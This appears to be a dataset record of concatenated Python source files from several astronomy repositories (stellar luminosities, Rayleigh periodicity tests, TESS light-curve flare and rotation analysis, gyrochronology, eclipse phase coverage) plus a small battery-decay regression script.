return 10.0 ** logR
def Chi_fl(giclr):
'''
Compute the Chi_fl parameter, defined as Flux(Kepler band) / Flux (Bol)
Used to convert L_fl/L_kp to L_fl/L_bol
NOTE: only defined between 0 <= g-i <= 5,
or approximately 1.5 >= M_sun >= 0.15
Parameters
----------
giclr: float or numpy float array of the g-i stellar color
Returns
-------
Chi_fl values
'''
fit = np.array([-0.00129193, 0.02105752, -0.14589187, 0.10493256, 0.00440871])
return 10.0**np.polyval(fit, giclr)
def massL(m1=0.2, m2=1.3, dm=0.01, isochrone='1.0gyr.dat'):
try:
__file__
except NameError:
__file__ = os.getenv("HOME") + '/python/appaloosa/appaloosa/analysis.py'
dir = os.path.dirname(os.path.realpath(__file__)) + '/../misc/'
file = dir + isochrone
df = pd.read_table(file, delim_whitespace=True, comment='#',
names=('Z', 'log_age', 'M_ini', 'M_act', 'logL/Lo', 'logTe', 'logG',
'mbol', 'Kepler', 'g', 'r', 'i', 'z', 'DDO51_finf','int_IMF',
'stage', 'J', 'H', 'Ks', 'U', 'B', 'V', 'R', 'I'))
masses = np.arange(m1, m2, dm)
mass_iso = df['M_ini'].values
ss = np.argsort(mass_iso) # needs to be sorted for interpolation
Mkp_iso = df['Kepler'].values
# BV = np.interp((mass), mass_iso[ss], BV_iso[ss])
pc2cm = 3.08568025e18
F_kp = _ABmag2flux(Mkp_iso)
L_kp = np.array(F_kp * (4.0 * np.pi * (10. * pc2cm)**2.0), dtype='float')
logLs = np.interp(masses, mass_iso[ss], np.log10(L_kp[ss]))
return masses, logLs
def energies(gmag, kmag, isochrone='1.0gyr.dat', return_all=False):
'''
Compute the quiescent energy for every star. Use the KIC (g-i) color,
with an isochrone, get the absolute Kepler mag for each star, and thus
the distance & luminosity.
Isochrone is a 1.0 Gyr track from the Padova CMD v2.7
http://stev.oapd.inaf.it/cgi-bin/cmd_2.7
Kepler and Sloan phot system both in AB mags.
Returns
-------
Quiescent Luminosities in the Kepler band
'''
# read in Padova isochrone file
# note, I've cheated and clipped this isochrone to only have the
# Main Sequence, up to the blue Turn-Off limit.
try:
__file__
except NameError:
__file__ = os.getenv("HOME") + '/python/appaloosa/appaloosa/analysis.py'
dir = os.path.dirname(os.path.realpath(__file__)) + '/../misc/'
'''
Mkp, Mg, Mr, Mi = np.loadtxt(dir + isochrone, comments='#',
unpack=True, usecols=(8,9,10,11))
# To match observed data to the isochrone, cheat:
# e.g. Find interpolated g, given g-i. Same for Kp
# do this 3 times, each color combo. Average result for M_kp
Mgi = (Mg-Mi)
ss = np.argsort(Mgi) # needs to be sorted for interpolation
Mkp_go = np.interp((gmag-imag), Mgi[ss], Mkp[ss])
Mg_o = np.interp((gmag-imag), Mgi[ss], Mg[ss])
Mgr = (Mg-Mr)
ss = np.argsort(Mgr)
Mkp_ro = np.interp((gmag-rmag), Mgr[ss], Mkp[ss])
Mr_o = np.interp((gmag-rmag), Mgr[ss], Mr[ss])
Mri = (Mr-Mi)
ss = np.argsort(Mri)
Mkp_io = np.interp((rmag-imag), Mri[ss], Mkp[ss])
Mi_o = np.interp((rmag-imag), Mri[ss], Mi[ss])
Mkp_o = (Mkp_go + Mkp_ro + Mkp_io) / 3.0
dist_g = np.array(_DistModulus(gmag, Mg_o), dtype='float')
dist_r = np.array(_DistModulus(rmag, Mr_o), dtype='float')
dist_i = np.array(_DistModulus(imag, Mi_o), dtype='float')
dist = (dist_g + dist_r + dist_i) / 3.0
dm_g = (gmag - Mg_o)
dm_r = (rmag - Mr_o)
dm_i = (imag - Mi_o)
dm = (dm_g + dm_r + dm_i) / 3.0
'''
mass, Mkp, Mg, Mk = np.loadtxt(dir + isochrone, comments='#',
unpack=True, usecols=(2,8,9,18))
Mgk = (Mg-Mk)
ss = np.argsort(Mgk) # needs to be sorted for interpolation
Mkp_o = np.interp((gmag-kmag), Mgk[ss], Mkp[ss])
Mk_o = np.interp((gmag-kmag), Mgk[ss], Mk[ss])
mass_o = np.interp((gmag-kmag), Mgk[ss], mass[ss])
dist = np.array(_DistModulus(kmag, Mk_o), dtype='float')
dm = (kmag - Mk_o)
pc2cm = 3.08568025e18
# returns Flux [erg/s/cm^2]
F_kp = _ABmag2flux(Mkp_o + dm)
# again, classic bread/butter right here,
# change Flux to Luminosity [erg/s]
L_kp = np.array(F_kp * (4.0 * np.pi * (dist * pc2cm)**2.0), dtype='float')
# !! Should be able to include errors on (g-i), propagate to
# errors on Distance, and thus lower error limit on L_kp !!
# !! Should have some confidence about the interpolation,
# e.g. if beyond g-i isochrone range !!
if return_all is True:
return np.log10(L_kp), dist, np.array(mass_o, dtype='float')
else:
return np.log10(L_kp)
```
#### File: appaloosa/appaloosa/rayleigh.py
```python
import numpy as np
import matplotlib.pyplot as plt
def RayleighTest(t, v):
'''
Evaluate the normalized Rayleigh test for a series of event times (t)
at a single given frequency (v).
'''
n = len(t)
theta = 2. * np.pi * v * t
z = 1. / n * (( np.sum(np.sin(theta))**2 +
np.sum(np.cos(theta))**2 ))
return z
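# Usage sketch (added): for strictly periodic events the normalized Rayleigh
# power approaches the number of events, while random event times give power
# of order unity. E.g. events every 10 s, evaluated at v = 0.1 Hz:
# t = np.arange(20) * 10.0
# RayleighTest(t, 0.1) # ~ 20 (= n, fully coherent)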
def RayleighPowerSpectrum(times, minper=1.0, maxper=500., nper=100):
'''
Compute the power spectrum over a range of periods by evaluating the
Rayleigh test at each frequency.
Periods are assumed to be in units of Days.
'''
maxfreq = 1. / (minper * 24. * 60. * 60.)
minfreq = 1. / (maxper * 24. * 60. * 60.)
# Evaluate at linearly spaced frequencies
freqs = np.linspace(minfreq, maxfreq, num=nper)
# periods = 1. / freqs / (24. * 60. * 60.)
z = [RayleighTest(times * (24. * 60. * 60.), v) for v in freqs]  # build a list (a lazy map object cannot be plotted directly)
return z
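# Usage sketch (added): event times are given in days; e.g. scan periods
# between 2 and 50 days with 200 frequency samples:
# z = RayleighPowerSpectrum(event_days, minper=2., maxper=50., nper=200)
# (here event_days is a placeholder numpy array of event times, in days)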
def DrogeTest():
'''
Data from:
http://adsabs.harvard.edu/abs/1990ApJS...73..279D
Remake Figure 2 for 64 solar flare events.
'''
# Table 1, Occurrence Times of ISEE 3 Electron Flares
# Units of Days since 01-AUG-1978
data = [53.415, 167.566, 201.688, 212.428, 245.049, 367.896, 382.592,
403.373, 409.292, 471.847, 498.718, 556.378, 612.627, 676.053,
676.133, 690.056, 696.676, 698.446, 716.235, 806.215, 814.439,
816.401, 836.771, 845.779, 965.282, 967.860, 974.065, 976.408,
977.208, 983.698, 987.986, 997.580, 1001.861, 1003.125, 1084.554,
1092.840, 1163.958, 1168.269, 1194.163, 1209.139, 1250.257,
1278.986, 1280.581, 1287.533, 1288.172, 1314.130, 1402.488,
1426.750, 1438.322, 1446.965, 1448.037, 1451.722, 1468.083,
1473.958, 1474.213, 1495.083, 1574.513, 1574.740, 1578.107,
1589.989, 1597.082, 1599.792, 1601.684, 1607.333]
data = np.array(data, dtype='float')
# frequency info given in nHz in the paper
fmin = 1e-9
fmax = 500e-9
df = 1.25e-9
n = int((fmax - fmin) / df)
freqs = np.linspace(fmin, fmax, num=n)
# convert those limits to Days for this code
maxper = 1. / (fmin * 24. * 60. * 60.)
minper = 1. / (fmax * 24. * 60. * 60.)
# Compute the power spectrum!
z = RayleighPowerSpectrum(data, minper=minper, maxper=maxper, nper=n)
# now recreate the actual plot from the paper
plt.figure()
plt.plot(freqs / 1e-9, z)
plt.xlabel('Frequency (nHz)')
plt.ylabel('Rayleigh power (z)')
plt.show()
return
``` |
{
"source": "jradavenport/emd",
"score": 2
} |
#### File: emd/emd/emd.py
```python
import numpy as np
from scipy.signal import argrelextrema
from scipy.interpolate import CubicSpline
def resid(t,f):
'''
Outline:
* find local maxima and minima with a 1-point extrema search
* this is a point of possible improvement
* fit cubic splines through the maxima and through the minima
* take the running mean of the upper and lower envelopes
* return the residual
'''
maxm = argrelextrema(f, np.greater)
minm = argrelextrema(f, np.less)
maxCS = CubicSpline(t[maxm], f[maxm])
maxi = maxCS(t, extrapolate=None)
minCS = CubicSpline(t[minm], f[minm])
mini = minCS(t, extrapolate=None)
meani = (maxi + mini) / 2.0
return f - meani
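# Usage sketch (added): one sifting step on a toy signal; the residual should
# be dominated by the fastest oscillation present (away from the edges):
# t = np.linspace(0, 10, 2000)
# f = np.sin(2 * np.pi * 5 * t) + 0.5 * np.sin(2 * np.pi * 0.5 * t)
# r = resid(t, f) # approximately the 5 Hz component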
def IMF(t, f, Nmax=200, SDmax=0.01, Zmax=5):
'''
compute the intrinsic mode function
'''
ftmp = f
i = 0
Zok = 0
while i<Nmax:
r1 = resid(t, ftmp)
# does the residual satisfy the 2 criteria?
# 1) Nextrema = Nzero_crossings
# 2) StdDev is lower than some threshold
SD = np.sum(np.power(np.abs(ftmp - r1), 2) / np.power(ftmp, 2))
# compute Nextrema
maxm = argrelextrema(r1, np.greater)
minm = argrelextrema(r1, np.less)
# from http://stackoverflow.com/a/30281079
Nzero = ((r1[:-1] * r1[1:]) < 0).sum()
if np.abs(Nzero - (np.size(maxm)+np.size(minm))) < 2:
Zok = Zok + 1
if SD <= SDmax:
i=Nmax
if Zok >= Zmax:
i=Nmax
i=i+1
ftmp = r1
return r1
``` |
{
"source": "jradavenport/gaia_rot",
"score": 3
} |
#### File: jradavenport/gaia_rot/from_ruth.py
```python
import numpy as np
def teff2bv(teff, logg, feh):
"""
Relation from Sekiguchi & Fukugita (2000).
original here:
https://gist.github.com/RuthAngus/53c90cb5e55b8467198d7d33a9fec424
"""
t = [-813.3175, 684.4585, -189.923, 17.40875]
f = [1.2136, 0.0209]
d1, g1, e1 = -0.294, -1.166, 0.3125
return t[0] + t[1]*np.log10(teff) + t[2]*(np.log10(teff))**2 + \
t[3]*(np.log10(teff))**3 + f[0]*feh + f[1]*feh**2 \
+ d1*feh*np.log10(teff) + g1*logg + e1*logg*np.log10(teff)
def gyro(B_V, age):
'''
Compute the rotation period expected for a star of a given color (temp) and age
NOTE: Age is in Myr
Eqn 15 from Angus+2015
'''
P = (age**0.55) * 0.4 * ((B_V - 0.45)**0.31)
return P
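# Usage sketch (added): chain the two relations to estimate a rotation period
# from Teff. For roughly solar parameters (Teff = 5777 K, logg = 4.44, [Fe/H] = 0)
# teff2bv returns B-V ~ 0.63, and gyro(B-V, 4570.) then gives roughly 24-25 days:
# bv = teff2bv(5777., 4.44, 0.)
# P = gyro(bv, 4570.)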
``` |
{
"source": "jradavenport/helloTESS",
"score": 2
} |
#### File: helloTESS/code/run_sector.py
```python
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib
import os
from glob import glob
import sys
import gc
from scipy.optimize import curve_fit
from astropy.table import Table
import astropy.io.fits as fits
from astropy.timeseries import LombScargle, BoxLeastSquares
import exoplanet as xo
# import pymc3 as pm
# import theano.tensor as tt
from stuff import FINDflare, EasyE, IRLSSpline
matplotlib.rcParams.update({'font.size':18})
matplotlib.rcParams.update({'font.family':'serif'})
ftype = '.pdf'
# tess_dir = '/data/epyc/data/tess/'
# tess_dir = '/Users/james/Desktop/tess/'
#
# sectors = ['sector001', 'sector002', 'sector003', 'sector004', 'sector005', 'sector006']
#
# # just in case glob wants to re-order things, be sure grab them in Sector order
# sect1 = glob(tess_dir + sectors[0] + '/*.fits', recursive=True)
# sect2 = glob(tess_dir + sectors[1] + '/*.fits', recursive=True)
# sect3 = glob(tess_dir + sectors[2] + '/*.fits', recursive=True)
# sect4 = glob(tess_dir + sectors[3] + '/*.fits', recursive=True)
# sect5 = glob(tess_dir + sectors[4] + '/*.fits', recursive=True)
# sect6 = glob(tess_dir + sectors[5] + '/*.fits', recursive=True)
#
# files = sect1 + sect2 + sect3 + sect4 + sect5 + sect6
# # make into an array for looping later!
# s_lens = [len(sect1), len(sect2), len(sect3), len(sect4), len(sect5), len(sect6)]
# print(s_lens, len(files))
def BasicActivity(sector, tess_dir = '/Users/james/Desktop/tess/',
run_dir = '/Users/james/Desktop/helloTESS/',
clobber=False):
'''
Run the basic set of tools on every light curve
Produce a diagnostic plot for each light curve
Save a file on Rotation stats and a file on Flare stats
'''
print('running ' + tess_dir + sector)
files_i = glob(tess_dir + sector + '/*.fits', recursive=True)
print(str(len(files_i)) + ' .fits files found')
# arrays to hold outputs
per_out = np.zeros(len(files_i)) -1
per_amp = np.zeros(len(files_i)) -1
per_med = np.zeros(len(files_i)) -1
per_std = np.zeros(len(files_i)) -1
ACF_1pk = np.zeros(len(files_i)) -1
ACF_1dt = np.zeros(len(files_i)) -1
blsPeriod = np.zeros(len(files_i)) -1
blsAmpl = np.zeros(len(files_i)) -1
EclNum = np.zeros(len(files_i)) -1
EclDep = np.zeros(len(files_i)) -1
FL_id = np.array([])
FL_t0 = np.array([])
FL_t1 = np.array([])
FL_f0 = np.array([])
FL_f1 = np.array([])
if not os.path.isdir(run_dir + 'figures/' + sector):
os.makedirs(run_dir + 'figures/' + sector)
plt.ioff()
for k in range(len(files_i)):
# print(files_i[k])
if k % 1000 == 0:
print(str(k) + '/'+str(len(files_i)))
tbl = -1
df_tbl = -1
try:
tbl = Table.read(files_i[k], format='fits')
df_tbl = tbl.to_pandas()
except (OSError, KeyError, TypeError, ValueError):
print('k=' + str(k) + ' bad file: ' + files_i[k])
# this is a bit clumsy, but it made sense at the time when trying to chase down some bugs...
if tbl != -1:
# make harsh quality cuts, and chop out a known bad window of time (might add more later)
AOK = (tbl['QUALITY'] == 0) & ((tbl['TIME'] < 1347) | (tbl['TIME'] > 1350))
med = np.nanmedian(df_tbl['PDCSAP_FLUX'][AOK])
# ACF w/ Exoplanet package
acf = xo.autocorr_estimator(tbl['TIME'][AOK], tbl['PDCSAP_FLUX'][AOK] / med,
yerr=tbl['PDCSAP_FLUX_ERR'][AOK] / med,
min_period=0.07, max_period=27, max_peaks=2)
if len(acf['peaks']) > 0:
ACF_1dt[k] = acf['peaks'][0]['period']
ACF_1pk[k] = acf['autocorr'][1][np.where((acf['autocorr'][0] == acf['peaks'][0]['period']))[0]][0]
s_window = int(ACF_1dt[k] / np.abs(np.nanmedian(np.diff(tbl['TIME']))) / 6.)
else:
s_window = 128
# do a running median for a basic smooth
# smo = (df_tbl['PDCSAP_FLUX'][AOK].rolling(128, center=True).median() + df_tbl['PDCSAP_FLUX'][AOK].rolling(256, center=True).median()) / 2.
smo = df_tbl['PDCSAP_FLUX'][AOK].rolling(s_window, center=True).median()
# make an output plot for every file
figname = run_dir + 'figures/' + sector + '/' + files_i[k].split('/')[-1] + '.jpeg' #run_dir + 'figures/longerP/' + TICs[0].split('-')[2] + '.jpeg'
makefig = ((not os.path.exists(figname)) | clobber)
if makefig:
plt.figure(figsize=(12,9))
plt.errorbar(tbl['TIME'][AOK], tbl['PDCSAP_FLUX'][AOK]/med, yerr=tbl['PDCSAP_FLUX_ERR'][AOK]/med,
linestyle=None, alpha=0.15, label='PDC_FLUX')
plt.plot(tbl['TIME'][AOK], smo/med, label=str(s_window)+'pt MED')
if (ACF_1dt[k] > 0):
plt.plot(tbl['TIME'][AOK],
np.nanstd(smo / med) * ACF_1pk[k] * np.sin(tbl['TIME'][AOK] / ACF_1dt[k] * 2 * np.pi) + 1,
label='ACF=' + format(ACF_1dt[k], '6.3f') + 'd, pk=' + format(ACF_1pk[k], '6.3f'), lw=2,
alpha=0.7)
# plt.errorbar(tbl['TIME'][AOK], tbl['SAP_FLUX'][AOK]/Smed, yerr=tbl['SAP_FLUX_ERR'][AOK]/Smed,
# linestyle=None, alpha=0.25, label='SAP_FLUX')
# require at least 1000 good datapoints for analysis
if sum(AOK) > 1000:
# find OK points in the smoothed LC
SOK = np.isfinite(smo)
# do some SPLINE'ing
# spl = IRLSSpline(df_tbl['TIME'].values[AOK][SOK], df_tbl['PDCSAP_FLUX'].values[AOK][SOK] / med,
# df_tbl['PDCSAP_FLUX_ERR'].values[AOK][SOK] / med)
# flares
FL = FINDflare((df_tbl['PDCSAP_FLUX'][AOK][SOK] - smo[SOK])/med,
df_tbl['PDCSAP_FLUX_ERR'][AOK][SOK]/med,
N1=4, N2=2, N3=5, avg_std=False)
if np.size(FL) > 0:
for j in range(len(FL[0])):
FL_id = np.append(FL_id, k)
FL_t0 = np.append(FL_t0, FL[0][j])
FL_t1 = np.append(FL_t1, FL[1][j])
FL_f0 = np.append(FL_f0, med)
FL_f1 = np.append(FL_f1, np.nanmax(tbl['PDCSAP_FLUX'][AOK][SOK][(FL[0][j]):(FL[1][j]+1)]))
if makefig:
if np.size(FL) > 0:
for j in range(len(FL[0])):
plt.scatter(tbl['TIME'][AOK][SOK][(FL[0][j]):(FL[1][j]+1)],
tbl['PDCSAP_FLUX'][AOK][SOK][(FL[0][j]):(FL[1][j]+1)] / med, color='r',
label='_nolegend_')
plt.scatter([],[], color='r', label='Flare?')
# Lomb Scargle
LS = LombScargle(df_tbl['TIME'][AOK], df_tbl['PDCSAP_FLUX'][AOK]/med, dy=df_tbl['PDCSAP_FLUX_ERR'][AOK]/med)
frequency, power = LS.autopower(minimum_frequency=1./40.,
maximum_frequency=1./0.1,
samples_per_peak=7)
best_frequency = frequency[np.argmax(power)]
per_out[k] = 1./best_frequency
per_amp[k] = np.nanmax(power)
per_med[k] = np.nanmedian(power)
per_std[k] = np.nanstd(smo[SOK]/med)
if np.nanmax(power) > 0.05:
LSmodel = LS.model(df_tbl['TIME'][AOK], best_frequency)
if makefig:
plt.plot(df_tbl['TIME'][AOK], LSmodel,
label='L-S P='+format(1./best_frequency, '6.3f')+'d, pk='+format(np.nanmax(power), '6.3f'))
# here is where a simple Eclipse (EB) finder goes
# EE = EasyE(smo[SOK]/med, df_tbl['PDCSAP_FLUX_ERR'][AOK][SOK]/med,
# N1=5, N2=3, N3=2)
EE = EasyE(df_tbl['PDCSAP_FLUX'][AOK][SOK]/med - smo[SOK]/med,
df_tbl['PDCSAP_FLUX_ERR'][AOK][SOK] / med, N1=5, N2=2.5, N3=2.5)
# N1 datapoints long, and
# N2 times below the stddev, and
# N3 times below the error
if (np.size(EE) > 0):
# need to test if EE outputs look periodic-ish, or just junk...
noE = np.arange(len(SOK))
for j in range(len(EE[0])):
if makefig:
plt.scatter(tbl['TIME'][AOK][SOK][(EE[0][j]):(EE[1][j]+1)],
df_tbl['PDCSAP_FLUX'][AOK][SOK][(EE[0][j]):(EE[1][j]+1)] / med,
color='k', marker='s', s=5, alpha=0.75, label='_nolegend_')
noE[(EE[0][j]):(EE[1][j]+1)] = -1
EclDep[k] = EclDep[k] + np.nanmin(df_tbl['PDCSAP_FLUX'][AOK][SOK][(EE[0][j]):(EE[1][j] + 1)] / med - smo[SOK][(EE[0][j]):(EE[1][j] + 1)]/med)
if makefig:
plt.scatter([],[], color='k', marker='s', s=5, alpha=0.75, label='Ecl: '+str(len(EE[0])))
EclNum[k] = len(EE[0])
EclDep[k] = EclDep[k] / float(len(EE[0]))  # plain float(); np.float is deprecated and removed in NumPy >= 1.24
okE = np.where((noE > -1))[0]
else:
okE = np.arange(len(SOK))
# do some GP'ing, from:
# https://exoplanet.dfm.io/en/stable/tutorials/stellar-variability/
# if False:
# with pm.Model() as model:
#
# # The mean flux of the time series
# mean = pm.Normal("mean", mu=1.0, sd=10.0)
#
# # A jitter term describing excess white noise
# # print(AOK.shape, SOK.shape, okE.shape)
# yerr = df_tbl['PDCSAP_FLUX_ERR'].values[AOK][SOK] / med
# y = df_tbl['PDCSAP_FLUX'].values[AOK][SOK] / med
# x = df_tbl['TIME'].values[AOK][SOK]
#
# logs2 = pm.Normal("logs2", mu=2 * np.log(np.min(yerr)), sd=5.0)
#
# # The parameters of the RotationTerm kernel
# logamp = pm.Normal("logamp", mu=np.log(np.var(y)), sd=5.0)
# logperiod = pm.Normal("logperiod", mu=np.log(acf['peaks'][0]['period']), sd=5.0)
# logQ0 = pm.Normal("logQ0", mu=1.0, sd=10.0)
# logdeltaQ = pm.Normal("logdeltaQ", mu=2.0, sd=10.0)
# mix = pm.Uniform("mix", lower=0, upper=1.0)
#
# # Track the period as a deterministic
# period = pm.Deterministic("period", tt.exp(logperiod))
#
# # Set up the Gaussian Process model
# kernel = xo.gp.terms.RotationTerm(
# log_amp=logamp,
# period=period,
# log_Q0=logQ0,
# log_deltaQ=logdeltaQ,
# mix=mix
# )
# gp = xo.gp.GP(kernel, x, yerr ** 2 + tt.exp(logs2), J=4)
#
# # Compute the Gaussian Process likelihood and add it into the
# # the PyMC3 model as a "potential"
# pm.Potential("loglike", gp.log_likelihood(y - mean))
#
# # Compute the mean model prediction for plotting purposes
# pm.Deterministic("pred", gp.predict())
#
# # Optimize to find the maximum a posteriori parameters
# map_soln = xo.optimize(start=model.test_point)
#
# gpspl = map_soln["pred"]
# plt.plot(df_tbl['TIME'].values[AOK][SOK], gpspl+1, label='GP')
# add BLS
bls = BoxLeastSquares(df_tbl['TIME'][AOK][SOK], smo[SOK]/med, dy=df_tbl['PDCSAP_FLUX_ERR'][AOK][SOK]/med)
blsP = bls.autopower([0.05], method='fast', objective='snr',
minimum_n_transit=3, minimum_period=0.1, maximum_period=15,
frequency_factor=1.5)
blsPer = blsP['period'][np.argmax(blsP['power'])]
if ((np.nanmax(blsP['power']) > 2.5*np.nanstd(blsP['power']) + np.nanmedian(blsP['power']) ) &
# (np.nanmax(blsP['power']) > 10.) &
(blsPer < 0.95 * np.nanmax(blsP['period']))
):
blsPeriod[k] = blsPer
blsAmpl[k] = np.nanmax(blsP['power'])
if makefig:
plt.plot([],[], ' ', label='BLS='+format(blsPer, '6.3f')+'d, snr='+format(np.nanmax(blsP['power']), '6.3f'))
if makefig:
# plt.plot(df_tbl['TIME'].values[AOK][SOK], spl, label='spl')
plt.title(files_i[k].split('/')[-1] + ' k='+str(k), fontsize=12)
plt.ylabel('Flux')
plt.xlabel('BJD - 2457000 (days)')
plt.legend(fontsize=10)
# plt.show()
plt.savefig(figname, bbox_inches='tight', pad_inches=0.25, dpi=100)
plt.close()
# reset the data again, not needed, but juuuuuust in case
del tbl
del df_tbl
del AOK
gc.collect()
# write per-sector output files
ALL_TIC = pd.Series(files_i).str.split('-', expand=True).iloc[:,-3].astype('int')
flare_out = pd.DataFrame(data={'TIC':ALL_TIC[FL_id], 'i0':FL_t0, 'i1':FL_t1, 'med':FL_f0, 'peak':FL_f1})
flare_out.to_csv(run_dir + 'outputs/' + sector + '_flare_out.csv')
rot_out = pd.DataFrame(data={'TIC':ALL_TIC,
'LSper':per_out, 'LSamp':per_amp, 'LSmed':per_med, 'LSstd':per_std,
'acf_pk':ACF_1pk, 'acf_per':ACF_1dt,
'bls_per':blsPeriod, 'bls_ampl':blsAmpl,
'ecl_num':EclNum, 'ecl_dep':EclDep})
rot_out.to_csv(run_dir + 'outputs/' + sector + '_rot_out.csv')
if __name__ == "__main__":
'''
let this file be called from the terminal directly. e.g.:
$ python run_sector.py sector001
'''
BasicActivity(sys.argv[1])
``` |
{
"source": "jradavenport/P_e_window",
"score": 3
} |
#### File: jradavenport/P_e_window/thegrid.py
```python
import numpy as np
def phase_coverage(time, E1_TIME, E2_TIME, e_window=0.5, minP=-1, maxP=-1,
return_coverage=True, downsample=True):
if minP<0:
minP = np.abs(E1_TIME - E2_TIME)
if maxP<0:
maxP = (np.max(time) - np.min(time)) + minP
P = np.arange(minP, maxP+e_window, e_window)
E = np.arange(0, 1 + e_window/maxP, e_window/maxP)
if return_coverage:
PP, EE = np.meshgrid(P, E, indexing='ij')
coverage = np.zeros_like(EE)
pc = np.zeros_like(P)
is1 = np.zeros_like(P)
is2 = np.zeros_like(P)
if downsample:
hh, be = np.histogram(time, bins = np.arange(np.min(time), np.max(time), e_window/2))
time = ((be[1:]+be[:-1])/2)[np.where((hh > 0))[0]]
oki = np.where(((time < (E2_TIME - e_window)) | (time > (E2_TIME + e_window))) &
((time < (E1_TIME - e_window)) | (time > (E1_TIME + e_window)))
)[0]
for i in range(len(P)):
win_i = e_window / P[i] # the eclipse window size in phase to examine at this period
if return_coverage:
coverage[i,:-1], _ = np.histogram(((time[oki] - E1_TIME) % P[i]) / P[i], bins=E)
pc_i = ((E2_TIME - E1_TIME) % P[i]) / P[i]
phase_i = ((time[oki] - E1_TIME) % P[i]) / P[i]
is1[i] = sum((phase_i <= win_i) | (phase_i >= (1-win_i)))
is2[i] = sum((phase_i >= (pc_i - win_i)) & (phase_i <= (pc_i + win_i)))
if return_coverage:
return P, is1, is2, PP, EE, coverage
else:
return P, is1, is2
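# Usage sketch (added; numbers are hypothetical): two eclipses seen at
# t = 10.0 and t = 17.0 days within a densely sampled 90-day light curve.
# t_obs = np.arange(0., 90., 0.02)
# P, n1, n2 = phase_coverage(t_obs, 10.0, 17.0, e_window=0.5, return_coverage=False)
# One way to read the output: n1/n2 count how many other epochs fall inside each
# eclipse window at every trial period, so trial periods where either count is
# zero were never re-observed at eclipse phase and cannot be excluded by the
# rest of the light curve.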
``` |
{
"source": "jradavenport/rapid-spin-down",
"score": 2
} |
#### File: rapid-spin-down/code/stuff.py
```python
import numpy as np
def Barnes2003_I(BV,t):
'''
interface gyrochrone
eqns 1 & 2 from Barnes (2003)
t in Myr
'''
P = np.sqrt(t) * np.sqrt(BV - 0.5) - 0.15 * (BV - 0.5)
return P
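# Sanity check (added): for B-V = 0.65 and t = 4570 Myr the interface-sequence
# relation above returns ~26 days, roughly the solar rotation period:
# Barnes2003_I(0.65, 4570.) # ~ 26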
def Barnes2003_C(BV,t):
'''
convective gyrochrone
eqn 15 from Barnes (2003)
t in Myr
'''
PI = Barnes2003_I(BV,t)
P = 0.2 * np.exp(t / (100* (BV + 0.1 - (t/3000))**3))
bd = np.where((P >= PI))[0]
if len(bd) > 0:
P[bd] = np.nan
return P
def bv2teff(BV, logg=4.3, feh=0):
"""
Relation from Sekiguchi & Fukugita (2000)
https://arxiv.org/abs/astro-ph/9904299
"""
# Full Sample, Tbl 3
c = np.array([3.939654, -0.395361, 0.2082113, -0.0604097])
f1, f2, g1, h1 = 0.027153, 0.005036, 0.007367, -0.01069
logTeff = c[0] + c[1]*BV + c[2]*(BV**2) + c[3]*(BV**3) + \
f1*feh + f2*(feh**2) + \
g1*logg + h1*BV*logg
return 10**logTeff
def BarnesPdot(BV, time):
'''
taking the derivative
'''
dt = time[1]-time[0] # in Myr
P = Barnes2003_C(BV, time) # in days
return np.gradient(P)/365.25/1e6 / dt # unitless
def OmC(BV,time, T=10, f=1):
'''
assume 10yr observing baseline
following helpful math from JJ Hermes' webpage
http://jjherm.es/research/omc.html
'''
P = Barnes2003_C(BV, time)
Pdot = BarnesPdot(BV,time) * f # a fudge-factor to explore
OC = Pdot / (2*P) * ((T*365.25)**2) # in days
OC = OC * 24*60 # in min
return OC
def twogaus(x, a1, x01, sigma1, a2, x02, sigma2, c):
model = (a1 * np.exp(-(x - x01)**2 / (2 * sigma1**2)) +
a2 * np.exp(-(x - x02)**2 / (2 * sigma2**2)) +
a1 * np.exp(-(x - x01 - 1)**2 / (2 * sigma1**2)) +
a2 * np.exp(-(x - x02 - 1)**2 / (2 * sigma2**2)) +
a1 * np.exp(-(x - x01 + 1)**2 / (2 * sigma1**2)) +
a2 * np.exp(-(x - x02 + 1)**2 / (2 * sigma2**2)) + c)
return model
def gaus(x, a, x0, sigma, b):
"""
Simple Gaussian function
Parameters
----------
x : float or 1-d numpy array
The data to evaluate the Gaussian over
a : float
the amplitude
b : float
the constant offset
x0 : float
the center of the Gaussian
sigma : float
the width of the Gaussian
Returns
-------
Array or float of same type as input (x).
"""
return a * np.exp(-(x - x0)**2 / (2 * sigma**2)) + b
``` |
{
"source": "jradding10/Decay",
"score": 3
} |
#### File: jradding10/Decay/decay_ml.py
```python
import sys
import copy
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeRegressor
from sklearn import tree
from sklearn.metrics import mean_squared_error as MSE
def ml_battery_dt(battery_data):
'''
trains the decision tree regression model
Arguments:
battery_data(string): user inputed name of csv file
Returns:
dt.fit: regression model
'''
global X_train, X_test, y_train, y_test
cell_data = pd.read_csv(battery_data)
X = cell_data[['Cycle_Index', 'Test_Time (s)', 'Min_Voltage (V)']]
y = cell_data['Discharge_Energy (Wh)']
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)
dt = DecisionTreeRegressor(max_depth=20, min_samples_leaf=0.1,
random_state=3)
dt.fit(X_train.values, y_train.values) # added values w/o feature
return dt
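# Sketch of the expected CSV layout (added; column names are taken from the
# code above, the example rows are made up -- the real format depends on the
# battery cycler export):
# Cycle_Index,Test_Time (s),Min_Voltage (V),Discharge_Energy (Wh)
# 1,3600.0,3.12,1.85
# 1,7200.0,3.05,1.79
# ...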
def ml_battery_RMS(dt):
'''
Returns:
rmse_dt(float): root mean squared error of the model predictions on the held-out test data
source: https://www.youtube.com/watch?v=ksvJDLdc9eA&ab_channel=DataCamp
'''
y_pred = dt.predict(X_test.values) # added values without feature
mse_dt = MSE(y_test, y_pred)
rmse_dt = mse_dt ** (1/2)
return rmse_dt
if __name__ == '__main__':
'''
Main takes input files from user and outputs RMSE and visual
'''
try:
battery_data = sys.argv[1] # user selects file
except IOError:
print("Unable to open " + battery_data)
print("Format your entry like this:\npy python-file-name.py csv-file-name.csv")
exit()
# train the battery
dt = ml_battery_dt(battery_data)
# output visual in dot file
print("RMSE CALCULATED: " + str(ml_battery_RMS(dt)))
# output visual in dot file
out_tree_vis = tree.export_graphviz(dt, out_file='battery_datatree.dot',
feature_names=['Cycle Index', 'Test Time',
'Min Voltage'], filled=True)
# above source https://mljar.com/blog/visualize-decision-tree/
``` |
{
"source": "jrade/JrBoost",
"score": 2
} |
#### File: Python/example/iris.py
```python
import itertools, pickle, os, time
import numpy as np
import pandas as pd
import jrboost
#-----------------------------------------------------------------------------------------------------------------------
